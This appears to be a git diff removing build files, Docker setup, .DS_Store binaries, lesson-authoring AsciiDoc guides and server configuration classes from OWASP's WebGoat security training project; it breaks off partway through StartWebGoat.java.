z(E3WYH)!iVQ64vxq-IEJ&<*RjMU*G=t~Andukk>aC{L02X_~Yh!ZxqDr&pHmWp_TI
z*v`p}X40(A)9nu*xnqZ1FZUO}O8Hk5glQJlr>ZpDrr2J0NrO$XPH%AqXn+oS=p2Pv
z&>#b+;Td=qo`Y9l70$x@@ClrQ&*4k>3ciLl_!)kIU*R|S1O7%pL=meogf&=;H{gxf
zgw5E39oU7pVmJ0+A0ETwcmhXo0uz|T6snlUhw%}76qoTSd>&uM*Kq|`@jX0?AL2*u
zoB~Bmhf4sYB7REQdJw&rZ-L26ffydD6^H*H5ZAW5_|@*L^LXsLxTs~zSjrQJ$fbnS
zQ>23fx(>+;1Zl&rMln22kZB9$%U;Am+Ug?2y!S-HVM*ZBuxfJ)RRe^!z{hIc7Z#-o
z4lwH_Hp5aCN0n8HN>QrhFtch;FZFKW%(Cj?Bh(A-4~W%+En$&%s(*vq3cL#+bJV_p
z@8C!H34Vt^39>2ztR5Q(uQ2Y$o3Isc#x`sxz<TgDyd4kW5DpV&cM)h~gxM5M;|zhO
z;T+DRj#+dtj|E)7$M7^hj!)o|gxw4HBEE#L;%jBV9W4Xy%zEI`*5II;b5a1`+EsPj
zw*<$urCz2tGk>`~H6PEKhGovtm__*4PsOiYxdIjL5HdUe4{iSb|H^OVkKildD{$2+
zfR%&s!G4<FW?L;gYe(q1k1m#&-?D3Y2xa^@PL?0X$+B|=PgIVu0@;{nmt9LOl>YM<
V0sJo{dn)_SfB*T<5xgd|e*j!~4)Op1

diff --git a/webgoat-lessons/webgoat-lesson-template/src/main/java/org/owasp/.DS_Store b/webgoat-lessons/webgoat-lesson-template/src/main/java/org/owasp/.DS_Store
deleted file mode 100644
index 2609cccd36d669cdf7efd8f2caf906bc80c36410..0000000000000000000000000000000000000000
GIT binary patch
literal 0
HcmV?d00001

literal 8196
zcmeI0TTC2P7{|YFfigR7WfqDI#ckIBu~a~A6{>ArZqnM45*JvY=sLSI!o=B`&CcvD
ziYTUuw-}9=#Kc4sL9Nl)CymAj6JMGd<1ML19`wb;s81$7nV9Hz&dfHjln`IMq;ocN
zzH|A$GiUziH#2(%0B|6ub^^!%Ake|Aw3D(cB-YQ4O)22Duui0S01Fgwk_9`HG&Xtr
z4ZZ@t0=@#i0=@#i0{;aC=$*}yu*G}d?e%kC0bhZuQUUgSh|s}o)U(U3<&O@^_!fX{
zIW_Y{W!eYun22Yio?Uh=52Z2P-2-}|=xs634X6GHb0-`1?6Pa!a6mU4&^t4FI~3$+
zr??1r2aLMb&wT}a1vV?dZktLdfCfpJTfcv|lGO7@GGpkr)6ubpfwJ<79hE{*+{u1Y
zNW3dHZxv#W;^gcBC3}X~bX7}w<uS#XFP6tG%eY)tl9RetNJx7IEz?nSQ_HRkosH|J
zY83{ooT=KgF?YPUt~&Dxsdg-@<tcPbF||qE)|0xSJNFAg_De_&i;HcYUESTSk<Ol;
zrPjz|XLom3Yozy3&(f0gogg%{9O@sP&MZB-vijQVZ=8Gc!bMjM^d2ZsQzFhMo0T!<
zI%6p-omuBuqMc#q$C3uqE?^b4`*xjn@=!>;Jt0-I>o}cpbj!3SwX97xAywHV=!ukN
zde<3GSw=2x+6gI?QjAp2P#mq_Fk<=xnmy%c3l1yI*jCmV<c<kR%GuhT8u{sYZHT<>
zDV>I6ZW0FH+Eu%EU*mzcuHGY;c3)E^g{nnyh6FYp{a#(mP868R(~6zaOjS4M;&~>q
zp^ckLS_=g}3kG@AwRN&MtJ2t`mdfH(={>>iX{eLsGpuJYt5L2B0uR_9k;QSFO+oP-
zo0>&&{61P|$@T_qIVj2#hLY3_Ne#MT?Kg>XJnu>)o%9;JdqjDP79dTNwnNzJHTNBs
z<-6ILPbs!@I-{91tBZ8{qsMOBE!W8d#Y-u@L_wHlQT?h)vu%tXaF;dM813*DSb%zH
zrx(z1n57#e183nWcp9F8mtYmn!@KYiT!2sEbNB+jgf;jPeuAIj7x)eSL_kClt1yJs
zScBK$_1K6_*o^JigEwO@_F+Gsz>|0iM{yDpn8XySn8pY3A$%B@@d<nuU&L2&1y}JM
zJdf|=2kx8#MO;VLK}bdXn6k|<(uX(>WBf`mhKFm!k$(rqwOuZPHG673Ci^chY{^ot
zXNrU5lEMip62c+ffaN6uwSI4d7@i=|w1v{8FCrmTx)?F<{gH535;!@m+SE+d0O2k0
zv04s>MX8KK%zBB>uvEcuWmO_ml*&2KtlD>&dUtScS@q~K>IL^EV)bBiSfr=c-$8B#
z-i8l3ZePJS@ICwhzrybXS_MH?hxLS5828}~*n&4=E4C42eRvDribrr5M+mh$2)1!T
zZ3?GxhG5fh4(CzFEIOFS0xsYqcorYU$MA7N?>T%PU%;2~l@jQVmq2%JGjwTdXh_XD
zDS)r-iZJ&t!7^>B+jwN=w|ma!V_DO%%sCprctdQQnqS*qfil-cX8Zr)t-t?oKalU?
zE8r{ezf}OshhjqmH2tj}r2*=T&~XnPEHS@j*YXg`m<wy?+i|jNU%?ZVBdkC+>e*%2
YQVXSj{6oNof4Bbo-+%ve46nNEFVWu}lmGw#

diff --git a/webgoat-lessons/webgoat-lesson-template/src/main/java/org/owasp/webgoat/.DS_Store b/webgoat-lessons/webgoat-lesson-template/src/main/java/org/owasp/webgoat/.DS_Store
deleted file mode 100644
index 3efe5f71232d664d8ac3a94aab516092ac613b82..0000000000000000000000000000000000000000
GIT binary patch
literal 0
HcmV?d00001

literal 8196
zcmeHLU1%It6h3G3)7fcjW|PKD8n<0Zf=x|g{%TTf>*mk2wxPjIvPl|UXLrVAaCT<d
znca=XXr$mDqWA-XpkSg_6#JwoJ_x>)iuear%!9rNqCN>e34)$`XSO7prXU3^bnbHR
zx%ZxP?!EKfZ|>bQ0DuEIwG%)F0D&@-(sn8?k(i$4O)22@FeQ>dfDUG|U}utsmE2_Q
zclZeS2>1y22>1y22wV*a(4Ebau*JRaYW>njz(?SkM1Y+S5z0(PJ-O^kesoa5LjaQH
z)XfvsDGuO15l==vx$H{rN@Kdw1A4CLg&63%lRm=CNk%=n>`K=i&~*p&W=1bUK|VYA
zMYuU&)RlheBj6*j83Fd%R6+&}$iZAm{Qg%mW9YWi(Xobsvhs?`Z9-7o&VEuzyeBqq
z6=II!<m>?@dy2PoRZDvHF~ylL*2gW&xL8+`le$(&NV^6t(@}I&%dT^sjq9dr6$Y%F
zsoJwKcf7c+I`avsb}Xyq$#qOIwMpI9le(ch4+=r{OGpiii*21<-QBH`&Yqs7*2rRK
zcXwB7r1wD2(vtLpAT+cb=pUWVEIqxl`o^1Yoq7A*c^3-wjuWUUf#$PPT#UKSSjtLg
z*4b^q&9L)h?st!XRmAQ4b-2kxA@R<HRL!2@WX91g)1K6_HpzrkWfPdkQkLmGV?1RU
zxwL5~q)<vRQaM9$w0^^g=?`i4l%p*;tTtm?S!a+NCL}3mYj<m8r{}dHvbLvm8jhJs
z7<^|(?e0B|``WsC4_(-KU6mB77R4C?*L3vzbuBwlU<gkuc1kl<-JFZ(8N7xzZYpUl
z6!;<-<X+d;$>OX^V~<)Y^HZe{1Xt5gC(EapW-zN!sR{yj*c*|>ahokc@eG@qMREKA
z+GEM~25s3d$`gi?)C@@tx^C^ah;lsdLL(jbI=g#Bd5Yjq)1vJVwtC%t2W9zQHuDL^
zc1~tAlU8+}raye-j-7IyJWza;(nl18Y39|hs<hh1=stH-gN@M+Z+iu(hjzMpj>0Tx
z^m?3zXW&_Q4qky(I1BH?CvXlvhcDqP_!`#WXZQtvh2P*0_!|KcMXbUQR$~p`fHz_z
zHeoZiV-Mbnz1WBScnpu@2^_^qOkfgIsA3u)#z*i`T*jyHd3+gP#}!<~_wX!!h#$FY
z3KXe2vW|jO#ZRdyrK0x<E)c&I6~n_d;>iC)#kCzS0c&>EdW`J9xUD4{xt>v+MlMe{
ze~SFz6x~3|3q;fU-3?-Rf@r2Klx}>H5Yjf6M9g|`Bpj9m&KuTjYNlp@$Sv@(TK0!U
zsf<&YX^EX-se+T0HHnv^RL<$lntcaJTgh3=num{&7Ti~ewS&!Jk<P1sL%0=q7e3}>
z`v$&)AK@qX9sVSmRS?DMu$~AO#yxlww&2a!ifu%(KD-TY$3r-bBSf^jh-%|Rv?-j%
z8KRnob2yJWX3@bs7H|O{!_)XUK7mgX@m|0e@g;l}Un`;9(Gtp?DWzQ68X8h_P72^#
zyCTA^H&8Ndsh8Df<}ZJ`=3`mYu*^9cx%e9JN&Mmp5GZqfWfuPrZ~guM3TE(KeFS_2
zu66{ld?+?FK&#y9Xl1c>gz|lqSz>m}uH-IM@Nk?Y564NexPm9DM_7eq)RW7uq#jED
U`G)}h-`2nX{rjKO@0u<C0YK&!dH?_b

diff --git a/webgoat-lessons/webgoat-lesson-template/src/main/resources/.DS_Store b/webgoat-lessons/webgoat-lesson-template/src/main/resources/.DS_Store
deleted file mode 100644
index 6efa04a20a9e4d079ccb94bd03cc4336d7391b9f..0000000000000000000000000000000000000000
GIT binary patch
literal 0
HcmV?d00001

literal 6148
zcmeH~y-veW426#&LY2C7WW2A?jq$1~PrwWCQv^sU9a{EmeQl0?jTDHGIx)~=$@e6_
zcCPXbaSXs#ADbnx05GGw;^@oNeBXUy7a6&vnm=Q+f9fB1yPh|vn%8!C#Q|IN<N6M7
zSmFln<KPv8TRh+e&)APQPCZU}A|L`HAOa$A_5`v`&*o=OLI6ZS1b!0m??a)x*3_YC
zd^)(q2te%^4&!yq64c@WYE2!QGD5RfN^PZ<BZjqd#!Kea)S+oBhvo2Ld9vk%VsSd3
zUm_h=n`#vS5%^BPXK&iV`~NNdm-*jwWFjB}|CE4r>$~-eFPFV_@|xaj3;mw{Wz3Cq
mF42mq(TaKFt@wJBSNxj$HFanj<%~x;RX+mGMJ57&LEsaswH=rM

diff --git a/webgoat-lessons/webgoat-lesson-template/src/main/resources/html/.DS_Store b/webgoat-lessons/webgoat-lesson-template/src/main/resources/html/.DS_Store
deleted file mode 100644
index 5008ddfcf53c02e82d7eee2e57c38e5672ef89f6..0000000000000000000000000000000000000000
GIT binary patch
literal 0
HcmV?d00001

literal 6148
zcmeH~Jr2S!425mzP>H1@V-^m;4Wg<&0T*E43hX&L&p$$qDprKhvt+--jT7}7np#A3
zem<@ulZcFPQ@L2!n>{z**<q8>++&mCkOWA81W14cNZ<zv;LbK1Poaz?KmsK2CSc!(
z0ynLxE!0092;Krf2c+FF_Fe*7ECH>lEfg7;MkzE(HCqgga^y>{tEnwC%0;vJ&^%eQ
zLs35+`xjp>T0<F0fCPF1$Cyrb|F7^5{eNG?83~ZUUlGt@xh*qZDeu<Z%US-OSsOPv
j)R!Z4KLME7ReXlK;d!wEw5GODWMKRea10D2@KpjYNUI8I

diff --git a/webgoat-lessons/webgoat-lesson-template/src/main/resources/lessonPlans/en/lesson-template-content.adoc b/webgoat-lessons/webgoat-lesson-template/src/main/resources/lessonPlans/en/lesson-template-content.adoc
deleted file mode 100644
index 455485e06..000000000
--- a/webgoat-lessons/webgoat-lesson-template/src/main/resources/lessonPlans/en/lesson-template-content.adoc
+++ /dev/null
@@ -1,36 +0,0 @@
-== Step 1: writing content
-
-Each lesson can consist of multiple pages with content (text) to explain the vulnerability at hand. The content
-is written in AsciiDoc[https://asciidoctor.org/docs/asciidoc-writers-guide/] which makes it very easy to write content (if you know Markdown you know asciidoc).
-
-You can find excellent tutorials online for the asciidoc syntax we are just showing a basic overview below.
-Below we will describe some of the constructs which are quite often used within WebGoat.
-
-=== Sub-heading
-
-Check asciidoc for syntax, but more = means smaller headings.  You can *bold* text and other things.
-
-=== Structuring files
-
-You should set up all content so that it is these *.adoc files. The asciidoc files should be place in the
-directory `{lesson}/src/main/resources/lessonPlans/en` the last part depends on the locale.
-
-=== Images
-
-Images can be referenced as below including setting style (recommended to use lesson-image as the style). The root is `{lesson}/src/main/resources/images`
-
-image::images/firefox-proxy-config.png[Firefox Proxy Config,510,634,style="lesson-image"]
-
-=== Code block
-
-Code blocks can be written as follows:
-
-```
-[source]
-----
-public class A {
-
-  private String test;
-}
-----
-```
diff --git a/webgoat-lessons/webgoat-lesson-template/src/main/resources/lessonPlans/en/lesson-template-glue.adoc b/webgoat-lessons/webgoat-lesson-template/src/main/resources/lessonPlans/en/lesson-template-glue.adoc
deleted file mode 100644
index 8558aafba..000000000
--- a/webgoat-lessons/webgoat-lesson-template/src/main/resources/lessonPlans/en/lesson-template-glue.adoc
+++ /dev/null
@@ -1,59 +0,0 @@
-=== Step 3: Write glue html page
-
-We mentioned a lesson can consist of multiple assignments, WebGoat picks them up automatically and the UI displays
-a navigation bar on top of every lesson. A page with an assignment will be red in the beginning and will become
-green when the user solves the assignment. To make this work in the html we need to add:
-
-[source]
-----
-<html xmlns:th="http://www.thymeleaf.org">
-
-  <div class="lesson-page-wrapper">
-    <div class="adoc-content" th:replace="doc:lesson-template-intro.adoc"></div>
-  </div>
-  <div class="lesson-page-wrapper">
-    <div class="adoc-content" th:replace="doc:lesson-template-content.adoc"></div>
-  </div>
-  <div class="lesson-page-wrapper">
-    <div class="adoc-content" th:replace="doc:lesson-template-lesson-class.adoc"></div>
-  </div>
-</html>
-----
-
-This file needs to be places in: `{lesson}/src/main/resources/html/`. The name of the file should be the same as
-the Java class we created in step 2.
-
-This will create 3 separate pages (navigation bar) with the adoc pages we created to create this lesson.
-
-That's it we create a basic lesson with only content. To make it all work you need to make the lesson available in
-WebGoat.
-
-==== Create pom.xml
-
-See the `pom.xml` of this project copy it to your new lesson and change the name.
-
-==== Extend lesson project
-
-Change the file in `webgoat-lesson/pom.xml` and add:
-
-[source]
-----
-<module>new-lesson</module>
-----
-inside the existing `<modules>` tag.
-
-==== Add project to WebGoat
-
-Next step is to add a reference to the new project so WebGoat bundles it while building, open `pom.xml` in `webgoat-server/pom.xml`
-and add:
-
-[source]
-----
-<dependency>
-  <groupId>org.owasp.webgoat.lesson</groupId>
-  <artifactId>new-lesson</artifactId>
-  <version>${project.version}</version>
-</dependency>
-----
-
-That's it start WebGoat and your lesson will appear in the menu.
diff --git a/webgoat-lessons/webwolf-introduction/pom.xml b/webgoat-lessons/webwolf-introduction/pom.xml
deleted file mode 100644
index 24e781eff..000000000
--- a/webgoat-lessons/webwolf-introduction/pom.xml
+++ /dev/null
@@ -1,11 +0,0 @@
-<project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
-         xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/maven-v4_0_0.xsd">
-    <modelVersion>4.0.0</modelVersion>
-    <artifactId>webwolf-introduction</artifactId>
-    <packaging>jar</packaging>
-    <parent>
-        <groupId>org.owasp.webgoat.lesson</groupId>
-        <artifactId>webgoat-lessons-parent</artifactId>
-        <version>8.2.3-SNAPSHOT</version>
-    </parent>
-</project>
\ No newline at end of file
diff --git a/webgoat-lessons/webwolf-introduction/src/main/resources/lessonPlans/nl/IntroductionWebWolf.adoc b/webgoat-lessons/webwolf-introduction/src/main/resources/lessonPlans/nl/IntroductionWebWolf.adoc
deleted file mode 100644
index 038308f14..000000000
--- a/webgoat-lessons/webwolf-introduction/src/main/resources/lessonPlans/nl/IntroductionWebWolf.adoc
+++ /dev/null
@@ -1,25 +0,0 @@
-== Wat is WebWolf
-
-WebWolf is een web applicatie die onder jouw controle staat. En die jou als hacker in staat stelt om requests naar deze server te sturen.
-
-Daarnaast kun je WebWolf gebruiken als tool bij de oefeningen waarin email wordt gebruikt. Het simuleert je email inbox.
-
-WebWolf is bij een aantal opdrachten benodigd. Bv. bij de authentication flaws en de XXE XML Entity Injection voorbeelden. 
-
-Bij de introductie wordt de email functionaliteit uitgetest en daarmee wordt de totale setup van de workshop uitgetest.
-
-De lessen waarbij WebWolf nodig is, zijn gemarkeerd met:
-
-{nbsp}
-
-image::images/wolf-enabled.png[width=115,height=128]
-
-{nbsp}
-
-WebWolf heeft de volgende onderdelen:
-
-* Hosting van bestanden waarmee URL resources kunnen worden gemaakt
-* Email inbox
-* Log van binnenkomende requests die zijn uitgelokt op WebWolf
-
-Klik webWolfLink:here[] om WebWolf te starten. Je kunt dan met dezelfde gebruiker inloggen als waarmee je je in WebGoat hebt aangemeld.
diff --git a/webgoat-lessons/xxe/pom.xml b/webgoat-lessons/xxe/pom.xml
deleted file mode 100644
index 6c2528bed..000000000
--- a/webgoat-lessons/xxe/pom.xml
+++ /dev/null
@@ -1,31 +0,0 @@
-<project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
-         xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/maven-v4_0_0.xsd">
-    <modelVersion>4.0.0</modelVersion>
-    <artifactId>xxe</artifactId>
-    <packaging>jar</packaging>
-    <parent>
-        <groupId>org.owasp.webgoat.lesson</groupId>
-        <artifactId>webgoat-lessons-parent</artifactId>
-        <version>8.2.3-SNAPSHOT</version>
-    </parent>
-
-    <dependencies>
-        <dependency>
-            <groupId>org.apache.commons</groupId>
-            <artifactId>commons-lang3</artifactId>
-            <version>${commons-lang3.version}</version>
-        </dependency>
-        <dependency>
-            <groupId>org.glassfish.jaxb</groupId>
-            <artifactId>jaxb-runtime</artifactId>
-        </dependency>
-
-        <dependency>
-            <groupId>com.github.tomakehurst</groupId>
-            <artifactId>wiremock</artifactId>
-            <scope>test</scope>
-            <version>${wiremock.version}</version>
-        </dependency>
-
-    </dependencies>
-</project>
\ No newline at end of file
diff --git a/webgoat-server/Dockerfile b/webgoat-server/Dockerfile
deleted file mode 100644
index 31653199d..000000000
--- a/webgoat-server/Dockerfile
+++ /dev/null
@@ -1,17 +0,0 @@
-FROM openjdk:11.0.1-jre-slim-stretch
-
-ARG webgoat_version=v8.0.0-SNAPSHOT
-
-RUN \
-  apt-get update && apt-get install && \
-  useradd --home-dir /home/webgoat --create-home -U webgoat
-
-USER webgoat
-RUN cd /home/webgoat/; mkdir -p .webgoat-${webgoat_version}
-COPY target/webgoat-server-${webgoat_version}.jar /home/webgoat/webgoat.jar
-
-EXPOSE 8080
-
-WORKDIR /home/webgoat
-ENTRYPOINT ["java", "-Djava.security.egd=file:/dev/./urandom", "-jar", "/home/webgoat/webgoat.jar"]
-CMD ["--server.port=8080", "--server.address=0.0.0.0"]
diff --git a/webgoat-server/pom.xml b/webgoat-server/pom.xml
deleted file mode 100644
index dec76bfd0..000000000
--- a/webgoat-server/pom.xml
+++ /dev/null
@@ -1,229 +0,0 @@
-<project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
-         xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/maven-v4_0_0.xsd">
-    <modelVersion>4.0.0</modelVersion>
-    <artifactId>webgoat-server</artifactId>
-    <packaging>jar</packaging>
-    <parent>
-        <groupId>org.owasp.webgoat</groupId>
-        <artifactId>webgoat-parent</artifactId>
-        <version>8.2.3-SNAPSHOT</version>
-    </parent>
-
-    <properties>
-        <start-class>org.owasp.webgoat.StartWebGoat</start-class>
-    </properties>
-
-    <dependencies>
-        <dependency>
-            <groupId>org.owasp.webgoat</groupId>
-            <artifactId>webgoat-container</artifactId>
-            <version>${project.version}</version>
-        </dependency>
-        <dependency>
-            <groupId>org.owasp.webgoat.lesson</groupId>
-            <artifactId>challenge</artifactId>
-            <version>${project.version}</version>
-        </dependency>
-        <dependency>
-            <groupId>org.owasp.webgoat.lesson</groupId>
-            <artifactId>bypass-restrictions</artifactId>
-            <version>${project.version}</version>
-        </dependency>
-        <dependency>
-            <groupId>org.owasp.webgoat.lesson</groupId>
-            <artifactId>client-side-filtering</artifactId>
-            <version>${project.version}</version>
-        </dependency>
-        <dependency>
-            <groupId>org.owasp.webgoat.lesson</groupId>
-            <artifactId>crypto</artifactId>
-            <version>${project.version}</version>
-        </dependency>
-        <dependency>
-            <groupId>org.owasp.webgoat.lesson</groupId>
-            <artifactId>cross-site-scripting</artifactId>
-            <version>${project.version}</version>
-        </dependency>
-        <dependency>
-            <groupId>org.owasp.webgoat.lesson</groupId>
-            <artifactId>html-tampering</artifactId>
-            <version>${project.version}</version>
-        </dependency>
-        <dependency>
-            <groupId>org.owasp.webgoat.lesson</groupId>
-            <artifactId>http-basics</artifactId>
-            <version>${project.version}</version>
-        </dependency>
-        <dependency>
-            <groupId>org.owasp.webgoat.lesson</groupId>
-            <artifactId>http-proxies</artifactId>
-            <version>${project.version}</version>
-        </dependency>
-        <dependency>
-            <groupId>org.owasp.webgoat.lesson</groupId>
-            <artifactId>cia</artifactId>
-            <version>${project.version}</version>
-        </dependency>
-        <dependency>
-            <groupId>org.owasp.webgoat.lesson</groupId>
-            <artifactId>chrome-dev-tools</artifactId>
-            <version>${project.version}</version>
-        </dependency>
-        <dependency>
-            <groupId>org.owasp.webgoat.lesson</groupId>
-            <artifactId>idor</artifactId>
-            <version>${project.version}</version>
-        </dependency>
-        <dependency>
-            <groupId>org.owasp.webgoat.lesson</groupId>
-            <artifactId>csrf</artifactId>
-            <version>${project.version}</version>
-        </dependency>
-        <dependency>
-            <groupId>org.owasp.webgoat.lesson</groupId>
-            <artifactId>insecure-login</artifactId>
-            <version>${project.version}</version>
-        </dependency>
-        <dependency>
-            <groupId>org.owasp.webgoat.lesson</groupId>
-            <artifactId>insecure-deserialization</artifactId>
-            <version>${project.version}</version>
-        </dependency>
-        <dependency>
-            <groupId>org.owasp.webgoat.lesson</groupId>
-            <artifactId>jwt</artifactId>
-            <version>${project.version}</version>
-        </dependency>
-        <dependency>
-            <groupId>org.owasp.webgoat.lesson</groupId>
-            <artifactId>path-traversal</artifactId>
-            <version>${project.version}</version>
-        </dependency>
-        <dependency>
-            <groupId>org.owasp.webgoat.lesson</groupId>
-            <artifactId>sql-injection</artifactId>
-            <version>${project.version}</version>
-        </dependency>
-        <dependency>
-            <groupId>org.owasp.webgoat.lesson</groupId>
-            <artifactId>vulnerable-components</artifactId>
-            <version>${project.version}</version>
-        </dependency>
-        <dependency>
-            <groupId>org.owasp.webgoat.lesson</groupId>
-            <artifactId>xxe</artifactId>
-            <version>${project.version}</version>
-        </dependency>
-        <dependency>
-            <groupId>org.owasp.webgoat.lesson</groupId>
-            <artifactId>auth-bypass</artifactId>
-            <version>${project.version}</version>
-        </dependency>
-        <dependency>
-            <groupId>org.owasp.webgoat.lesson</groupId>
-            <artifactId>webgoat-introduction</artifactId>
-            <version>${project.version}</version>
-        </dependency>
-        <dependency>
-            <groupId>org.owasp.webgoat.lesson</groupId>
-            <artifactId>webwolf-introduction</artifactId>
-            <version>${project.version}</version>
-        </dependency>
-        <dependency>
-            <groupId>org.owasp.webgoat.lesson</groupId>
-            <artifactId>missing-function-ac</artifactId>
-            <version>${project.version}</version>
-        </dependency>
-        <dependency>
-            <groupId>org.owasp.webgoat.lesson</groupId>
-            <artifactId>password-reset</artifactId>
-            <version>${project.version}</version>
-        </dependency>
-        <dependency>
-            <groupId>org.owasp.webgoat.lesson</groupId>
-            <artifactId>ssrf</artifactId>
-            <version>${project.version}</version>
-        </dependency>
-        <dependency>
-            <groupId>org.owasp.webgoat.lesson</groupId>
-            <artifactId>secure-passwords</artifactId>
-            <version>${project.version}</version>
-        </dependency>
-        <dependency>
-            <groupId>org.owasp.webgoat.lesson</groupId>
-            <artifactId>spoof-cookie</artifactId>
-            <version>${project.version}</version>
-        </dependency>
-        <dependency>
-            <groupId>org.owasp.webgoat.lesson</groupId>
-            <artifactId>hijack-session</artifactId>
-            <version>${project.version}</version>
-        </dependency>
-        <dependency>
-            <groupId>org.owasp.webgoat.lesson</groupId>
-            <artifactId>webgoat-lesson-template</artifactId>
-            <version>${project.version}</version>
-        </dependency>
-        <dependency>
-            <groupId>org.owasp.webgoat.lesson</groupId>
-            <artifactId>logging</artifactId>
-            <version>${project.version}</version>
-        </dependency>
-        <dependency>
-            <groupId>org.springframework.boot</groupId>
-            <artifactId>spring-boot-devtools</artifactId>
-            <optional>true</optional>
-        </dependency>
-        <dependency>
-            <groupId>org.postgresql</groupId>
-            <artifactId>postgresql</artifactId>
-        </dependency>
-    </dependencies>
-
-    <build>
-        <plugins>
-            <plugin>
-                <groupId>org.springframework.boot</groupId>
-                <artifactId>spring-boot-maven-plugin</artifactId>
-                <configuration>
-                    <excludeDevtools>true</excludeDevtools>
-                    <!-- See http://docs.spring.io/spring-boot/docs/current/reference/html/howto-build.html#howto-extract-specific-libraries-when-an-executable-jar-runs -->
-                    <requiresUnpack>
-                        <dependency>
-                            <groupId>org.thymeleaf.extra</groupId>
-                            <artifactId>thymeleaf-extras-springsecurity5++</artifactId>
-                        </dependency>
-                        <dependency>
-                            <groupId>org.asciidoctor</groupId>
-                            <artifactId>asciidoctorj</artifactId>
-                        </dependency>
-                        <dependency>
-                            <groupId>org.jruby</groupId>
-                            <artifactId>jruby-complete</artifactId>
-                        </dependency>
-                    </requiresUnpack>
-                    <jvmArguments>
-                        <!-- -Xdebug -Xrunjdwp:transport=dt_socket,server=y,suspend=y,address=8000-->
-                    </jvmArguments>
-                    <fork>true</fork>
-                </configuration>
-            </plugin>
-            <plugin>
-                <groupId>org.apache.maven.plugins</groupId>
-                <artifactId>maven-jar-plugin</artifactId>
-                <executions>
-                    <execution>
-                        <phase>test-compile</phase>
-                        <goals>
-                            <goal>jar</goal>
-                        </goals>
-                        <configuration>
-                            <classifier>internal</classifier>
-                        </configuration>
-                    </execution>
-                </executions>
-            </plugin>
-        </plugins>
-    </build>
-
-</project>
diff --git a/webgoat-server/src/main/java/org/owasp/webgoat/HSQLDBDatabaseConfig.java b/webgoat-server/src/main/java/org/owasp/webgoat/HSQLDBDatabaseConfig.java
deleted file mode 100644
index 791036826..000000000
--- a/webgoat-server/src/main/java/org/owasp/webgoat/HSQLDBDatabaseConfig.java
+++ /dev/null
@@ -1,65 +0,0 @@
-package org.owasp.webgoat;
-
-import lombok.extern.slf4j.Slf4j;
-import org.hsqldb.server.Server;
-import org.springframework.beans.factory.annotation.Value;
-import org.springframework.boot.autoconfigure.condition.ConditionalOnProperty;
-import org.springframework.boot.jdbc.DataSourceBuilder;
-import org.springframework.context.annotation.Bean;
-import org.springframework.context.annotation.Configuration;
-import org.springframework.context.annotation.DependsOn;
-import org.springframework.context.annotation.Primary;
-import org.springframework.core.annotation.Order;
-import org.springframework.jdbc.datasource.DriverManagerDataSource;
-
-import javax.annotation.PreDestroy;
-import javax.sql.DataSource;
-import java.sql.Driver;
-import java.util.Map;
-
-
-/**
- * Rationale for this class: when the HSQLDB is started with jdbc:file:// it is only accessible from within the same
- * JVM. This can only be done if you start a standalone HSQLDB. We need both WebWolf and WebGoat to use the same database
- */
-@Configuration
-@Slf4j
-@ConditionalOnProperty(prefix = "webgoat.start", name = "hsqldb", havingValue = "true")
-public class HSQLDBDatabaseConfig {
-
-    @Value("${hsqldb.port:9001}")
-    private int hsqldbPort;
-    private Server server;
-
-    @Bean(initMethod = "start", destroyMethod = "stop")
-    public Server hsqlStandalone(@Value("${webgoat.server.directory}") String directory,
-                                 @Value("${hsqldb.silent:true}") boolean silent,
-                                 @Value("${hsqldb.trace:false}") boolean trace,
-                                 @Value("${server.address}") String address) {
-        log.info("Starting internal database on port {} ...", hsqldbPort);
-        server = new Server();
-        server.setDatabaseName(0, "webgoat");
-        server.setDatabasePath(0, directory + "/data/webgoat");
-        server.setDaemon(true);
-        server.setAddress(address);
-        server.setTrace(trace);
-        server.setSilent(silent);
-        server.setPort(hsqldbPort);
-        return server;
-    }
-
-    @PreDestroy
-    public void shutdown() {
-        server.shutdownCatalogs(1);
-    }
-
-    @Bean
-    @DependsOn("hsqlStandalone")
-    @Primary
-    public DataSource dataSource(@Value("${spring.datasource.url}") String url,
-                                 @Value("${spring.datasource.driver-class-name}") String driverClassName) {
-        DriverManagerDataSource driverManagerDataSource = new DriverManagerDataSource(url);
-        driverManagerDataSource.setDriverClassName(driverClassName);
-        return driverManagerDataSource;
-    }
-}
diff --git a/webgoat-server/src/main/java/org/owasp/webgoat/StartWebGoat.java b/webgoat-server/src/main/java/org/owasp/webgoat/StartWebGoat.java
deleted file mode 100644
index 99396b122..000000000
--- a/webgoat-server/src/main/java/org/owasp/webgoat/StartWebGoat.java
+++ /dev/null
@@ -1,80 +0,0 @@
-/*
- * This file is part of WebGoat, an Open Web Application Security Project utility. For details,
- * please see http://www.owasp.org/
- * <p>
- * Copyright (c) 2002 - 2017 Bruce Mayhew
- * <p>
- * This program is free software; you can redistribute it and/or modify it under the terms of the
- * GNU General Public License as published by the Free Software Foundation; either version 2 of the
- * License, or (at your option) any later version.
- * <p>
- * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without
- * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
- * General Public License for more details.
- * <p>
- * You should have received a copy of the GNU General Public License along with this program; if
- * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA
- * 02111-1307, USA.
- * <p>
- * Getting Source ==============
- * <p>
- * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software
- * projects.
- * <p>
- */
-
-package org.owasp.webgoat;
-
-import lombok.extern.slf4j.Slf4j;
-
-import java.io.IOException;
-import java.net.Socket;
-
-import org.springframework.boot.SpringApplication;
-import org.springframework.boot.autoconfigure.SpringBootApplication;
-import org.springframework.boot.web.servlet.ServletComponentScan;
-import org.springframework.boot.web.servlet.support.SpringBootServletInitializer;
-import org.springframework.util.StringUtils;
-
-/**
- * Main entry point, this project is here to get all the lesson jars included to the final jar file
- *
- * @author nbaars
- * @date 2/21/17
- */
-@SpringBootApplication(scanBasePackages = "org.owasp.webgoat")
-@ServletComponentScan
-@Slf4j
-public class StartWebGoat extends SpringBootServletInitializer {
-
